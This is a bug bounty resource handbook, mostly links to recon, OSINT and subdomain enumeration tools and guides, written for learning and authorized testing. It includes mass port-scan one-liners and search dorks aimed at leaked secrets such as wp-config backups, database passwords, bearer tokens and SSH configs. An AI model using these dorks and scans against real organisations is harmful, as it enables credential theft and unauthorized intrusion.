# Introduction

Welcome to Bug Hunter Handbook. This book will contain list of resources that will help bug bounty hunters with resources that are useful during their bug bounty journey. These are resources I have collected for my personal reference and full credit goes respective the Blog/Article/Presentation/Tweet owners and the awesome community.

Also Checkout - [Book of Bug Bounty Tips](https://app.gitbook.com/@gowsundar/s/book-of-bugbounty-tips) for additional tricks&#x20;

{% hint style="info" %}
*Note: There are lot of additional articles / resources available for attacks and vulnerabilities, can be found using Google. I have collected articles that i found useful during my tests.*
{% endhint %}

📌I will try my level best to update the sections with latest resources.&#x20;

Feedback and Suggestions are always welcome. if you like my work please share the book and feel free to contact me [@gowsundar](https://twitter.com/gowsundar).&#x20;

If you like my work please support [here](https://paypal.me/sirpika).

&#x20;


# Getting Started in InfoSec and Bug Bounties.

This page contains blogs/ articles to help with getting started in  Information Security and Bug Bounties.

**Blogs / Articles:**

* [How do I get started with bug bounty hunting? How do I improve my skills?  ](https://bugbountyguide.com/hunters/get-started.html)
* [Becoming a Bug-Bounty Hunter](https://www.billdietrich.me/PenetrationTestingAndBugBountyHunting.html#Miscellaneous)
* [Resources-for-Beginner-Bug-Bounty-Hunters](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters)
* [Resources-for-Application-Security](https://github.com/security-prince/Resources-for-Application-Security)
* [Starting BugBounty : From noob to beginner](https://www.jomar.fr/posts/2019/12/en-starting-bugbounty-from-noob-to-beginner/)
* [The Five Pillars of an Information/Cyber Security Professional](https://github.com/ED-209-MK7/5pillars/blob/master/5-Pillars.md)
* [Getting started in Bug Bounty](https://medium.com/inbughunters/getting-started-in-bug-bounty-7052da28445a)
* [Guide 001 | Getting Started in Bug Bounty Hunting](https://whoami.securitybreached.org/2019/06/03/guide-getting-started-in-bug-bounty-hunting/)**.**
* <https://www.levelupinfosec.com/freestuff>
* <https://blog.isiraadithya.com/my-bug-bounty-journey/?s=09>
* <https://github.com/s0md3v/be-a-hacker>

**Tweets:**

{% embed url="<https://twitter.com/stokfredrik/status/1083754981621141505>" %}

{% embed url="<https://twitter.com/stokfredrik/status/1088841355412062208>" %}

{% embed url="<https://twitter.com/thecybermentor/status/1207559600616161281>" %}

{% embed url="<https://twitter.com/JamesofStark/status/1207649529949876224>" %}

{% embed url="<https://twitter.com/hakluke/status/1432944492701646849?s=20>" %}

**Youtube References:**

{% embed url="<https://www.youtube.com/watch?v=5JJrJGZ_LjM&list=PL1y1iaEtjSYiiSGVlL1cHsXN_kvJOOhu->" %}

{% embed url="<https://www.youtube.com/watch?v=hDYqWZ11njU&feature=youtu.be>" %}

{% embed url="<https://securityflow.io/roadmap>" %}

* <https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters>


# Presentations

This Page contains various presentations delivered at various conferences.

| **Topic**                                                              | **Link**                                                                                                               |
| ---------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------- |
| BUG BOUNTY FUNSHOP                                                     | ​<https://docs.google.com/presentation/d/1cpcxEBEb0dyXwRqSWQ6bknJS-PQO_e242Dioy9SU2Io/edit#slide=id.g4715c86259_0_583> |
| Bug Hunting Methodology                                                | <https://blog.usejournal.com/bug-hunting-methodology-part-1-91295b2d2066>                                              |
| It is little things - Nahamsec                                         | <https://docs.google.com/presentation/d/1xgvEScGZ_ukNY0rmfKz1JN0sn-CgZY_rTp2B_SZvijk/edit#slide=id.g4052c4692d_0_1786> |
| Recon-1                                                                | <https://bugbountytuts.files.wordpress.com/2019/01/dirty-recon-1.pdf>                                                  |
| All in one Recon                                                       | <https://drive.google.com/file/d/1uBTra6_jwhLnZALJVp9hmHaty2pBBUH2/view>                                               |
| Automation for Bughunters                                              | <https://speakerdeck.com/mhmdiaa/automation-for-bug-hunters?slide=9>                                                   |
| Passivish Recon                                                        | <https://tomnomnom.com/talks/passiveish.pdf>                                                                           |
| Automating Application Security Bug Hunting                            | <https://static.sched.com/hosted_files/bsidessf2019/65/Automating%20Application%20Security%20Bug%20Hunting.pdf>        |
| BugBounty automation                                                   | <https://2018.zeronights.ru/wp-content/uploads/materials/4%20ZN2018%20WV%20-%20BugBounty%20automation.pdf>             |
| Automating Web Application Bug Hunting (Jerry Gamblin • Jonathan Cran) | <https://www.youtube.com/watch?v=12gtkYbMGd4>                                                                          |
| Work Smarter, Not Harder                                               | <https://vavkamil.cz/wp-content/uploads/2019/05/ctjb_2019_bugbounty.pdf>                                               |
| Automating-the-recon-process                                           | <https://null.community/event_sessions/2618-automating-the-recon-process>                                              |
| Scrutiny on the bug bounty                                             | <https://docs.google.com/presentation/d/1PCnjzCeklOeGMoWiE2IUzlRGOBxNp8K5hLQuvBNzrFY/edit#slide=id.p>                  |
| Bug Bounties With Bash                                                 | <https://tomnomnom.com/talks/bash-bug-bounty.pdf>                                                                      |
| ekoparty-2017-the-bug-hunters-methodology                              | <https://www.slideshare.net/bugcrowd/ekoparty-2017-the-bug-hunters-methodology>                                        |

* BugBounty Methodology by Jason Haddix

  | Version 1       | <https://github.com/jhaddix/tbhm/blob/master/How%20Do%20I%20shot%20Web-.pdf>                                         |
  | --------------- | -------------------------------------------------------------------------------------------------------------------- |
  | Version 2.0     | <https://docs.google.com/presentation/d/1p8QiqbGndcEx1gm4_d3ne2fqeTqCTurTC77Lxe82zLY/edit#slide=id.p>                |
  | Version 2.1     | <https://nullcon.net/website/archives/pdf/goa-2018/jason-tbhm2.pdf>                                                  |
  | Version 3       | <https://docs.google.com/presentation/d/1R-3eqlt31sL7_rj2f1_vGEqqb7hcx4vxX_L7E23lJVo/edit#slide=id.p>                |
  | Version 4       | <https://drive.google.com/file/d/1aG_qqRvNW-s5_8vvPk5rJiMSMeNL2uY9/view>                                             |
  | Version 4 Recon | <https://docs.google.com/presentation/d/1MWWXXRvvesWL8V-GiwGssvg4iDM58_RMeI_SZ65VXwQ/edit#slide=id.g89b65a088d_5_88> |
  | TBHM Video      | <https://www.youtube.com/watch?v=gIz_yn0Uvb8>                                                                        |

**VirSecCon Slides:**

```
https://docs.google.com/presentation/d/1Xfxr_zzwzczu0aKpxgYG8MzcT8zFlAmf7U_2C73NR1M/edit#slide=id.p16

https://tomnomnom.com/talks/bug-bounties-with-bash-virsec.pdf

https://docs.google.com/presentation/d/1DAQ47VjIaQZ88Ly00eGPQupq79hAF9AAZstV7OVCY_8/edit

https://docs.google.com/presentation/d/1f7yHnskJIl3O9GoZ4u_PHAnISRVaKoDb4V0CMRtNVRI/edit#slide=id.phttps://github.com/erbbysam/virseccon2020_presentation/blob/master/Trials,%20Tribulations%20&%20VHost%20Misconfigurations.pdf

https://www.ethicalhacker.net/wp-content/uploads/columns/editor/virseccon2020/Donzal-VirSecCon-2020-IoT-Hacking-Basics.pdf

https://docs.google.com/presentation/d/1-Qt4X5MNpDZSnbb1EWtKt7D26Plo--PL_nfMZKphY7w/edit#slide=id.p1

https://docs.google.com/presentation/d/e/2PACX-1vQXFAlzQctBpdeclp-rMCkflh-sNeVezktNqlwOoRMQxdAWNNlRsBUtlVHIIPDqu3hazL_UxDhShhEW/pub?slide=id.g742e3e7cd_1_16
```

**Nahamcon:**

{% embed url="<https://www.youtube.com/watch?v=MYsUhAgSgwc>" %}


# Checklists / Guides

* <https://medium.com/@cc1h2e1/bug-bounty-check-list-by-c1-2beb7ae3c116>
* <https://github.com/KathanP19/HowToHunt>
* <https://github.com/Voorivex/pentest-guide>
* <https://github.com/heilla/SecurityTesting>
* Bugbounty cheatsheet - Mohammed Adam - [Link](https://docs.google.com/spreadsheets/d/1TxNrvaIMRS_dmupcwjwJmXtaFk_lPGE1LzgxPu_7KqA/edit#gid=1308919623)
* <https://github.com/Fawadkhanfk/Check-List->
* Bug Bounty Roadmaps - <https://github.com/1ndianl33t/Bug-Bounty-Roadmaps>
* <https://book.hacktricks.xyz/>
* <https://six2dez.gitbook.io/pentest-book/recon/recon-methodology>
* <https://x0rb3l.github.io/Cyber-Bookmarks/bookmarks.html>
* <https://medium.com/@jmscory/security-tool-chest-4433950285f>
* <https://info.ninadmathpati.com/>
* <https://0xn3va.gitbook.io/cheat-sheets/web-application/server-side-request-forgery>
* <https://dmcxblue.gitbook.io/red-team-notes-2-0/>
* <https://www.thehacker.recipes/>
* <https://github.com/daffainfo/AllAboutBugBounty>
* <https://github.com/Neelakandan-A/BugBounty_CheatSheet>
* <https://m0chan.github.io/2019/12/17/Bug-Bounty-Cheetsheet.html>
* <https://github.com/imran-parray/Web-Sec-CheatSheet>

Tools Guide:

* <https://github.com/hahwul/WebHackersWeapons>

![https://twitter.com/hunter0x7/status/1347423296162304000?s=20](/files/-MWFcraaNQasbljvyNne)

![https://twitter.com/hunter0x7/status/1350021212743872513?s=20](/files/-MWFfHFPYepyrPHCgr7a)

![](/files/-MWFkthMLXN9j08oam8T)

* <https://github.com/kongsec/Vulnerabilities-Approach-Slides/blob/main/Book_of_tips_by_aditya_shende.pdf>


# Useful Twitter Threads

* Common ways to RCE - <https://twitter.com/Rhynorater/status/1115611217916321793>
* BugBountytip - <https://twitter.com/s0md3v/status/1119678625706463232>
* Recon - [https://twitter.com/stokfredrik/status/1109733020540567555](https://twitter.com/stokfredrik/status/1109733020540567555?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1109733020540567555\&ref_url=https%3A%2F%2Ftwitter.com%2Fstokfredrik%2Fstatus%2F1109733020540567555)
* Chaining of Bugs - <https://twitter.com/intigriti/status/1146376517284499456>
* <https://twitter.com/stokfredrik/status/1147461237359415298>
* <https://twitter.com/hakluke/status/1183314554874318849?>
* Tips - <https://twitter.com/CalumBoal/status/1165191825839349760>
* <https://twitter.com/pdp/status/1211949144304164864> - List of descriptions for bugs
* Learn Python = <https://twitter.com/humanhacker/status/1225061560302866432>
* List of conference - <https://twitter.com/SandboxBear/status/1225682764617240587>
* Infosec Books - <https://twitter.com/stokfredrik/status/1145030457442148357>

{% embed url="<https://twitter.com/KathanP19/status/1366732577369858058?s=20>" %}


# List of Vulnerabilities

{% hint style="info" %}
Check Sub-Section for resources.
{% endhint %}


# Recon and OSINT

Resources related to Recon and OSINT


# Recon

**Blog / Articles / Presentations / Videos:**

* Recon and Discovery - <https://www.youtube.com/watch?v=La3iWKRX-tE>

* <https://blog.usejournal.com/how-recon-helped-samsung-protect-their-production-repositories-of-samsungtv-ecommerce-estores-4c51d6ec4fdd>

* Doing Recon Like a Boss - <https://www.youtube.com/watch?v=1Kg0_53ZEq8>

* <https://blog.zsec.uk/ltr101-method-to-madness/>

* Presentation -<https://github.com/bugcrowd/bugcrowd_university/blob/master/Recon%20and%20Discovery/Bugcrowd%20University%20-%20Recon%20%26%20Discovery.pdf>

* Recon Everything - <https://medium.com/@maverickNerd/recon-everything-48aafbb8987>

* Recon Notes - <https://mavericknerd.github.io/knowledgebase/>

* [https://blog.detectify.com/2020/01/07/guest-blog-streaak-my-recon-techniques-from-201&#x39;**/**](https://blog.detectify.com/2020/01/07/guest-blog-streaak-my-recon-techniques-from-2019/)

* <https://medium.com/@europa_/recoinnassance-7840824b9ef2>&#x20;

* <https://medium.com/@ehsahil/recon-my-way-82b7e5f62e21>&#x20;

* [https://medium.com/bugbountywriteup/whats-tools-i-use-for-my-recon-during-bugbounty-](https://medium.com/bugbountywriteup/whats-tools-i-use-for-my-recon-during-bugbounty-ec25f7f12e6d)[ec25f7f12e6d](https://medium.com/bugbountywriteup/whats-tools-i-use-for-my-recon-during-bugbounty-ec25f7f12e6d)&#x20;

* <https://bugbountytuts.files.wordpress.com/2018/02/dirty-recon.pdf>&#x20;

* <https://blog.usejournal.com/web-application-security-bug-bounty-methodology-reconnaissance-vulnerabilities-reporting-635073cddcf2>&#x20;

* <http://imsoley.tk/mofb/>&#x20;

* <https://blog.detectify.com/2019/01/29/hacking-isnt-an-exact-science/>

* Ben Presentation - <https://docs.google.com/presentation/d/1xgvEScGZ_ukNY0rmfKz1JN0sn-CgZY_rTp2B_SZvijk/edit#slide=id.g3fc0937313_1_68>

* 100 Ways to Discover - <https://sylarsec.com/2019/01/11/100-ways-to-discover-part-1/>

* Asset Enumeration - <https://captmeelo.com/bugbounty/2019/09/02/asset-enumeration.html>

* Hacking Process - Recon - <https://www.youtube.com/watch?v=1bivJl0B_bs&feature=youtu.be>

* <https://medium.com/@shahjerry33/recon-my-way-or-high-way-58a18dab5c95>

* <https://www.offensity.com/de/blog/just-another-recon-guide-pentesters-and-bug-bounty-hunters/>

* <https://medium.com/@smhtahsin33/recon-one-step-advanced-with-otx-8827119566fd>

* <https://eslam3kl.medium.com/simple-recon-methodology-920f5c5936d4>

* [**https://systemweakness.com/ultimate-manual-bug-bounty-recon-guide-f30c900367c8**](https://systemweakness.com/ultimate-manual-bug-bounty-recon-guide-f30c900367c8)

* Google Dorks - <https://ahrefs.com/blog/google-advanced-search-operators/>
  * <https://github.com/HanPac/google-dorks-2018-2019/blob/master/dorks>
  * <https://twitter.com/s0md3v/status/1151759042785632256>
  * Pagodo -<https://twitter.com/search?q=pagodo%20recon&src=typed_query>
  * <https://twitter.com/intigriti/status/1116447376544280578>
  * <https://twitter.com/intigriti/status/1108365683069456385>
  * Tools - <https://github.com/ZephrFish/GoogD0rker/>
  * <https://github.com/1N3/Goohak>
  * <https://twitter.com/Th3G3nt3lman/status/1104111564632797186>
  * <https://blog.deesee.xyz/automation/osint/2020/01/07/semi-automation-dorking.html> - Google Dorks
  * [https://blog.ujwalkr.com/Google-Dorks-Recon/](https://ulogx.com/Google-Dorks-Recon/) - Goolgle Dork
  * <https://github.com/BullsEye0/google_dork_list/blob/master/google_Dorks.txt>
  * <https://gist.github.com/stevenswafford/393c6ec7b5375d5e8cdc>
  * DORK: inurl:wp-config-backup.txt
  * <https://exploitway.com/github-dorks-for-penetration-testing/>
  * <https://gist.github.com/zbetcheckin/04e6a5d7f2d5ef8cfa3c298701f47f9c>
  * <https://www.boxpiper.com/posts/google-dork-list>
  * <https://pastebin.com/zYPZNbMK>
  * Google Dork - <https://github.com/SKVNDR/FastDork>

**Tools:**

* AutoRecon - <https://github.com/JoshuaMart/AutoRecon>
* <https://bugbountyforum.com/tools/recon/> <https://github.com/eldraco/domain_analyzer> <http://www.spiderfoot.net/info/>&#x20;
* <https://dnsdumpster.com/> <https://github.com/codingo/Reconnoitre> NerdyData BuitWith hunter.io&#x20;
* <https://github.com/michenriksen/aquatone> Censys Robtex Shodan Whoxy <https://github.com/DataSploit/datasploit>
* &#x20;<https://github.com/reconned/domained> -- has multiple tools inbuilt&#x20;
* <https://github.com/evilsocket/xray>&#x20;
* <https://github.com/003random/003Recon>
* &#x20;<https://dnstrails.com/>
* <https://github.com/shibli2700/Rekon>
* Automation for Open Threat Exchange - <https://github.com/remonsec/Pri0tx>&#x20;
* Simple tool for get domain relationship.. [https://raw.githubusercontent.com/m4ll0k/Bug-Bounty-Toolz/master/getrelationship.py…](https://t.co/MuLnPJH5SQ?amp=1) -[@Jhaddix](https://twitter.com/Jhaddix)[@TomNomNom](https://twitter.com/TomNomNom)[@stokfredrik](https://twitter.com/stokfredrik)[@NahamSec](https://twitter.com/NahamSec)[@Yassineaboukir](https://twitter.com/Yassineaboukir) [#bugbountytips](https://twitter.com/hashtag/bugbountytips?src=hashtag_click) [#BugBounty](https://twitter.com/hashtag/BugBounty?src=hashtag_click)
* <https://github.com/hackerspider1/EchoPwn>
* <https://github.com/eslam3kl/3klCon>
* <https://github.com/cspshivam/easyrecon>
* [deksterecon](https://github.com/0xdekster/deksterecon)
* <https://github.com/remonsec/SEF>
* <https://github.com/chvancooten/BugBountyScanner>
* <https://github.com/Anon-Artist/R3C0Nizer>
* <https://github.com/dirsoooo/Recon>
* <https://github.com/gokulapap/Reconator>
* <https://github.com/Huntinex/rauton>

**Recon Cheatsheet:**

* <https://pentester.land/cheatsheets/2019/04/15/recon-resources.html>
* <https://github.com/0xhelloworld/public/blob/master/recon%20cheatsheet>
* Awesome Asset Discovery - <https://github.com/redhuntlabs/Awesome-Asset-Discovery>
* Asset Discovery - <https://0xpatrik.com/asset-discovery/?source=post_page--------------------------->

**Twitter Threads:**

* Getting info about Domains than subdomains - <https://twitter.com/gwendallecoguic/status/1187000587612762112>
* If the scope is[ http://example.com ](https://t.co/C9eI6hA592) only - <https://twitter.com/imhaxormad/status/1118289299152072706>
* <https://twitter.com/hackermaderas/status/1181970321588572160>
* <https://twitter.com/nullenc0de/status/1166539906832879616>
* ASN - <https://twitter.com/C1h2e11/status/1163806579474329600>
* ASN -[ oneliner to retrieve ASN numbers of a company. #bugbountytips (ls /tmp/GeoLite2-ASN-CSV.zip||wget --quiet -P /tmp "https://geolite.maxmind.com/download/geoip/database/GeoLite2-ASN-CSV.zip…") 2>&1|grep X; unzip -c /tmp/GeoLite2-ASN-CSV.zip|grep -i airbnb|cut -d ',' -f 2|sort -fu https://pastebin.com/G44mnY2x](https://twitter.com/gwendallecoguic/status/1199372098839437317)
* <https://twitter.com/hakluke/status/1199266508280434689> - ASN - whois -h [http://whois.cymru.com](https://t.co/UdRPPDcjcT?amp=1) $(dig +short [http://tesla.com](https://t.co/k4IDtlly9I?amp=1))
* ASN - <https://twitter.com/akita_zen/status/1169792876554969089>
* ASN - <https://twitter.com/_harleo/status/1198210924395597824>
* ASN - <https://twitter.com/hakluke/status/1225264234675597312>
* Quickly get the ASN of an IP address, along with the associated company name and location: curl [http://ipinfo.io](https://t.co/dRvPH4L2GA?amp=1)\<ip> This is a great way to confirm ownership of an IP/domain. It also is a great way to services that might be in use (AWS/Azure/Cloudfront/Akamai, etc.)[<br>](https://twitter.com/hakluke/status/1225264234675597312)
* CRT.sh - <https://twitter.com/Dondata4/status/1226535287930654720>
* Asset Discovery - <https://twitter.com/nullenc0de/status/1226982642295459846> // <https://github.com/cihanmehmet/sub.sh/blob/master/sub.sh>
* Massscan - Take a list of subdomains, resolve them to an IP, remove duplicates and scan each with masscan.

  masscan --rate 10000 -p1-65535 $(\<subdomains.txt xargs -I % getent hosts % | awk {'print $1'} | sort -u | tr '\n' ',' | sed 's/,$//')
* saw this a while ago it might help someone. curl -fsSL "[https://crt.sh/?CN=%25.%25.att.com\&exclude=expired …](http://web.archive.org/web/20200211114144/https://t.co/QR6yewgD6W)" | pup 'td :contains(".att.com") text{}' | sort -n | uniq -c | sort -rn | column -t > /root/Desktop/att-recon/ok.txt

![](/files/-M8nnO6VR3R8CWQBL_V7)

{% embed url="<https://twitter.com/streaak/status/1090649652318203904>" %}

{% embed url="<https://twitter.com/nnwakelam/status/1090869257779310592>" %}

{% embed url="<https://twitter.com/anspattnaik/status/1183269184052088832>" %}

{% embed url="<https://twitter.com/hackermaderas/status/1126502858239557633>" %}

{% embed url="<https://twitter.com/hakluke/status/1225264234675597312>" %}

{% embed url="<https://twitter.com/Vulkey_Chen/status/1178323315892449281>" %}

`ASN, CIDR => amass intel => enumeration script 'amass with api keys, findomain with api keys, and subfinder' => massDNS => httprobe => sort live and dead hosts => run a subtakeover script => hakcrawler`

Post Recon - <https://twitter.com/jobertabma/status/998769037445230592>

![https://twitter.com/aish\_kendle/status/1259909336274518016](/files/-M7GycA1jUOPQWPc4TcJ)

* Asset Discovery tool -<https://twitter.com/NahamSec/status/1260639679696629760>
* <https://github.com/bonino97/LemonBooster-v2>
* <https://github.com/carlospolop/hacktricks/blob/master/external-recon-methodology.md>
* <https://github.com/Quikko/Recon-Methodology>
*

```
DNS tools:

-viewdns.info
-dnslytics.com
-dnsspy.io
-leafdns.com
-dnsdumpster.com
-intodns.com
-www.zonecut.net/dns
-xip.io
-nip.io
-ptrarchive.com
-www.whatsmydns.net
-ceipam.eu/en/dnslookup.php
-spyse.com/tools/dns-lookup
-www.buddyns.com/delegation-lab
```

{% embed url="<https://twitter.com/payloadartist/status/1341053155535011840?s=20>" %}

{% embed url="<https://twitter.com/edu4rdshl/status/1396188826083774469?s=20>" %}

* Recon Roadmap - <https://ahmdhalabi.medium.com/ultimate-reconnaissance-roadmap-for-bug-bounty-hunters-pentesters-507c9a5374d>
* [<br>](https://twitter.com/m4ll0k2/status/1275493397806100480/photo/1)<https://medium.com/@prateek_0490/how-recon-helped-samsung-protect-their-production-repositories-of-samsungtv-ecommerce-estores-4c51d6ec4fdd>
* <https://github.com/Bo0oM/services-names-wordlist/blob/master/list.txt>
* <https://www.slideshare.net/slideshow/hacking-webapps-for-fun-and-profit-how-to-approach-a-target/82377302>
*

```
<figure><img src="/files/RAPQp4mouwa7g9U553VQ" alt=""><figcaption></figcaption></figure>
```


# Sensitive information using Github

**Articles / Blogs / Presentation :**

{% embed url="<https://medium.com/@ghostlulzhacks/github-osint-1e8a96f9fdb8>" %}

{% embed url="<https://github.com/bugcrowd/bugcrowd_university/blob/master/GitHub%20Recon/Bugcrowd%20University%20-%20GitHub%20Recon%20and%20Sensitive%20Data%20Exposure.pdf>" %}

* **How I made $10K in bug bounties from GitHub secret leaks -** [**https://tillsongalloway.com/finding-sensitive-information-on-github/index.html**](https://tillsongalloway.com/finding-sensitive-information-on-github/index.html)
* [**https://github.com/Zomato/vinifera**](https://github.com/Zomato/vinifera)

**Tools:**

* [**https://medium.com/@obheda12/gitdorker-a-new-tool-for-manual-github-dorking-and-easy-bug-bounty-wins-92a0a0a6b8d5**](https://medium.com/@obheda12/gitdorker-a-new-tool-for-manual-github-dorking-and-easy-bug-bounty-wins-92a0a0a6b8d5)
* [**https://github.com/gwen001/github-search**](https://github.com/gwen001/github-search)

{% embed url="<https://github.com/hisxo/gitGraber>" %}

{% embed url="<https://twitter.com/soaj1664ashar/status/1176769454035939328>" %}

{% embed url="<http://10degres.net/github-tools-collection/>" %}

{% embed url="<https://github.com/BishopFox/GitGot>" %}

Twitter Thread - <https://twitter.com/Johnssimon22/status/1152973288588500992>

**Videos:**

{% embed url="<https://www.youtube.com/watch?v=l0YsEk_59fQ&feature=youtu.be>" %}

**Tweets:**

{% embed url="<https://twitter.com/uraniumhacker/status/987573987818422272>" %}

{% embed url="<https://twitter.com/Th3G3nt3lman/status/1143585800640258050>" %}

{% embed url="<https://twitter.com/Th3G3nt3lman/status/1141994095457574912>" %}

{% embed url="<https://twitter.com/nullenc0de/status/1166539906832879616>" %}

{% embed url="<https://twitter.com/agrawalsmart7/status/1148251124710834176>" %}

{% embed url="<https://twitter.com/Dhamu_offi/status/1192052622372425729>" %}

**Others / Dorks:**

{% embed url="<https://gist.github.com/yassineaboukir/210c81f3d08ff9d9ca21e0ea543e016d>" %}

{% embed url="<https://github.com/techgaun/github-dorks>" %}

{% embed url="<https://gist.github.com/jakewarren/817070277ff36694165d>" %}

{% embed url="<https://securityonline.info/github-dorks/>" %}

{% embed url="<https://twitter.com/EdOverflow/status/1121759615010709504>" %}

{% embed url="<https://twitter.com/hakluke/status/1208189232549785600>" %}

{% embed url="<https://gist.github.com/jhaddix/77253cea49bf4bd4bfd5d384a37ce7a4>" %}
Jason Haddix
{% endembed %}

{% embed url="<https://twitter.com/y0dhha/status/1254398528467714048>" %}

* <https://github.com/adamtlangley/gitscraper>
* <https://tillsongalloway.com/finding-sensitive-information-on-github/>

{% embed url="<https://medium.com/@shahjerry33/github-recon-its-really-deep-6553d6dfbb1f>" %}

{% embed url="<https://twitter.com/hunter0x7/status/1314149862833876994>" %}

* Got SSH access![Heart exclamation](https://abs-0.twimg.com/emoji/v2/svg/2763.svg)![Heart exclamation](https://abs-0.twimg.com/emoji/v2/svg/2763.svg)![Heart exclamation](https://abs-0.twimg.com/emoji/v2/svg/2763.svg)![Heart exclamation](https://abs-0.twimg.com/emoji/v2/svg/2763.svg) Tip: Github Dork "site . com" ssh language:yaml Got config.yaml

{% embed url="<https://twitter.com/GodfatherOrwa/status/1334958681021091840>" %}

["company name" db\_password "company name" "Authorization: Bearer" "company name" filename:vim\_settings.xml "company name" language:shell "company name" language:python "company name" fb\_secret](https://twitter.com/payloadartist/status/1341811781728133122?s=20)

Dorks List:

* <https://github.com/gwen001/github-search>
* <https://github.com/obheda12/GitDorker/blob/master/Dorks/alldorksv3>
* <https://github.com/hisxo/gitGraber/tree/master/wordlists>
* [tinyurl.com/gitdorks](https://t.co/EkpgxT8foN?amp=1)

Dorks:

{% embed url="<https://twitter.com/obheda12/status/1352686678318731264?s=20>" %}

![](/files/-Mj7ssgWSeQBhPd0x8Q7)

* <https://vsec7.github.io/>


# Subdomain Enumeration

**Blog Posts / References / Presentations / Videos:**

1. Subdomain Enumeration Cheatsheet - <https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html>.
2. Practical recon techniques for bug hunters & pen testers - <https://blog.appsecco.com/practical-recon-techniques-for-bug-hunters-pen-testers-at-levelup-0x02-b72c15641972>
3. The Art of Subdomain Enumeration - <https://github.com/appsecco/the-art-of-subdomain-enumeration>.
4. Esoteric sub-domain enumeration techniques - <https://github.com/appsecco/bugcrowd-levelup-subdomain-enumeration>
5. Subdomain Enumeration: 2019 Workflow - [https://0xpatrik.com/subdomain-enume ration-2019/](https://0xpatrik.com/subdomain-enumeration-2019/)
6. Awesome Asset Discovery - <https://github.com/redhuntlabs/Awesome-Asset-Discovery#domain--subdomain-discovery>
7. A More Advanced Recon Automation #1 (Subdomains)[ - https://poc-server.com/blog/2019/01/18/advancedrecon-subdomains/](https://poc-server.com/blog/2019/01/18/advanced-recon-subdomains/)
8. Automating the Recon Process[-https://null.co.in/event\_sessions/2618-automating-the-recon-process](https://null.co.in/event_sessions/2618-automating-the-recon-process) - Video
9. OSINT for Proactive Defense - RootConf 2019 - <https://www.slideshare.net/redhuntlabs/osint-for-proactive-defense-rootconf-2019?next_slideshow=1>
10. Empowering red and blue teams with osint c0c0n 2017 - <https://www.slideshare.net/reconvillage/empowering-red-and-blue-teams-with-osint-c0c0n-2017>
11. Video -  OSINT for Proactive Defense - Shubam Mittal - <https://www.youtube.com/watch?time_continue=1301&v=0s2nmOZKQY8>
12. Gathering domains/subdomains with IPRanges of organization - <https://medium.com/@arbazhussain/gathering-domains-subdomains-with-ipranges-of-organization-49362d8a1271>
13. Compherensive Guide - <https://echocipher.github.io/2019/07/24/Subdomain-Recon/>
14. Converter.sh, a bash script to convert domain lists to resolved IP lists without duplicates - <https://gist.github.com/xdavidhu/07457247b9087dea4ddaf52858500cce>
15.

**Tools:**

1. **Top 7 Subdomain Scanner Tools -** <https://securitytrails.com/blog/subdomain-scanner-find-subdomains>
2. Subdomain list for bruteforcing - <https://twitter.com/Alra3ees/status/1068079409117188096>
3. <https://phonexicum.github.io/infosec/osint.html#subdomain--ip--e-mail-harvesting--enumirate--etc-concrete-tools>
4. <https://twitter.com/plenumlab/status/1068442310147547136>
5. <https://github.com/JannisKirschner/Horn3t>
6. Domain status checker - <https://github.com/unstabl3/recce>
7. Lazyrecon - <https://github.com/plenumlab/lazyrecon>
8. Second-order - <https://github.com/mhmdiaa/second-order>
9. FindDomain - <https://github.com/Edu4rdSHL/findomain>
10. CCrawlDNS - <https://github.com/lgandx/CCrawlDNS>
11. [Subdomainizer - https://github.com/nsonaniya2010/SubDomainizer](https://github.com/nsonaniya2010/SubDomainizer)
12. <https://github.com/Screetsec/Sudomy>
13. Assest Discovery - <https://github.com/chrismaddalena/ODIN>
14. Subdomain list for bruteforcing - <https://twitter.com/Alra3ees/status/1068079409117188096>
15. <https://twitter.com/_sawzeeyy/status/976171883212296192>
16. SubSanner - <https://github.com/cihanmehmet/sub.sh>
17. I got URLS - <https://github.com/xyele/igoturls>&#x20;
18. CC.py - Extracting URLs of a specific target based on the results of "commoncrawl.org" - <https://github.com/si9int/cc.py>
19. <https://github.com/hecvs17/ccrawlen> - Commoncrawl
20. A new generation of tool for discovering subdomains( ip , cdn and so on) - <https://github.com/yanxiu0614/subdomain3>
21. <https://github.com/c0rvax/project-black> - PROJECT BLACK
22. <https://github.com/BitTheByte/Monitorizer/> - Monitoring
23. <https://github.com/ProjectAnte/dnsgen> - dnsgen
24. <https://github.com/sethsec/celerystalk> - all tools combined
25. getallURLS - <https://twitter.com/hacker_/status/1192127358787997701>
26. &#x20;<https://github.com/hakluke/hakrawler> - [hakrawler](https://github.com/hakluke/hakrawler)
27. Resolver - <https://github.com/haxormad/domainresolver>
28. BASSS - <https://github.com/Abss0x7tbh/bass>
29. Censys Subdomain Finder - <https://github.com/christophetd/censys-subdomain-finder>
30. Trademark to discover doamins - <https://github.com/esecuritylab/kostebek>
31. Port Scanner - <https://gist.github.com/s0md3v/9234fc144f61acf5f2c447f605485eb5>
32. <https://github.com/zeropwn/spyse.py>
33. Tools Evaluation - <https://twitter.com/testermoving/status/1226947775033556992>
34. Subdomains Enumeration Cheat Sheet. - <https://twitter.com/Alra3ees/status/1225908724671401984>
35. Fetch known urls from AlienVault's Open Threat Exchange for given hosts - <https://github.com/lc/otxurls>
36. Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl. - <https://github.com/lc/gau>
37. Port Scanner - <https://github.com/projectdiscovery/naabu>
38. CTFR - Abusing Certificate Transparency logs for getting HTTPS websites subdomains. -<https://github.com/UnaPibaGeek/ctfr>
39. <https://github.com/rbsec/dnscan>
40. <https://github.com/s0md3v/Silver> - Masscan + nmap
41. <https://rapiddns.io> -- latest
42. suip.biz - no need to install tools
43. <https://github.com/internetwache/CT_subdomains> - hourly update of sub domains.
44. <https://github.com/shmilylty/OneForAll>
45. subscraper
46. Venkon.us - <https://www.venkon.us/subdomain-lister/>
47. Domainbigdata
48. <https://github.com/junnlikestea/vita>
49. <https://subdomainfinder.c99.nl/>
50. <https://github.com/hash3liZer/Subrake>
51. <https://github.com/allyomalley/LiveTargetsFinder>
52. Resolver - <https://github.com/Edu4rdSHL/rusolver>
53. <https://github.com/Fadavvi/Sub-Drill>
54. <https://github.com/jonluca/anubis>
55. <https://github.com/z3dc0ps/0x0p1n3r>
